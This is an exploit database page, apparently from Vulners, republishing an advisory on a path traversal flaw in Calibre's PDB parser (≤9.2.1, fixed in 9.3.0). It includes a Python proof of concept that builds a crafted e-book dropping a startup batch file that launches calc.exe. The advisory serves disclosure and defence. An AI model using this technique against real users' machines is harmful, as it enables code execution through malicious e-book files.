Vulners
Lucene search
📄 Calibre 9.2.1 Path Traversal / Arbitrary File Write
=============================================================================================================================================
| # Title : Calibre ≤ 9.2.1 PDB File Path Traversal Vulnerability Leading to Arbitrary File Write |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://manual.calibre-ebook.com/fr/tutorials.html |
=============================================================================================================================================
[+] Summary : Calibre is a cross-platform e-book management application used for viewing, converting, editing, and organizing digital books.
Versions 9.2.1 and below are vulnerable to a Path Traversal flaw in the PDB file parser, affecting both the 132-byte and 202-byte header variants of the PDB reader implementation.
The vulnerability allows a specially crafted PDB file to embed directory traversal sequences (such as ../) within internal filename fields. When processed by the application, these filenames are not properly sanitized before being written to disk.
[+] As a result, an attacker can:
Write arbitrary files anywhere the user has write permissions
Use arbitrary file extensions
Control the full file content
Silently overwrite existing files (files are written in wb mode)
[+] Impact :
This issue may lead to:
Arbitrary File Write
Local Code Execution (depending on file placement and execution context)
Denial of Service (DoS) through corruption of critical user files
Overwriting configuration, startup, or application data files
The vulnerability has been addressed and fixed in version 9.3.0.
Users are strongly advised to upgrade to version 9.3.0 or later to mitigate the issue.
[+] POC :
import struct
import os
def generate_exploit_pdb(filename="exploit.pdb"):
payload_code = b'@echo off\r\ncalc.exe\r\n'
traversal_path = b'../../../../startup_exploit.bat'
image_record = bytearray()
image_record += b'\x00' * 4
image_record += traversal_path.ljust(32, b'\x00')
image_record += b'\x00' * 26
image_record += payload_code
header = bytearray(132)
struct.pack_into('>H', header, 0, 2)
struct.pack_into('>H', header, 12, 2)
struct.pack_into('>H', header, 20, 1)
dummy_text = b'<html><body><h1>Hello World</h1></body></html>'
with open(filename, 'wb') as f:
f.write(b'Exploit Book'.ljust(32, b'\x00'))
f.write(b'\x00' * 46) # Padding to reach the records area
f.write(header)
f.write(dummy_text)
f.write(image_record)
print(f"[+] Exploit file created successfully: {filename}")
print(f"[*] Target path upon conversion: {traversal_path.decode()}")
if __name__ == "__main__":
generate_exploit_pdb()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Feb 2026 00:00Current
5.6Medium risk
Vulners AI Score5.6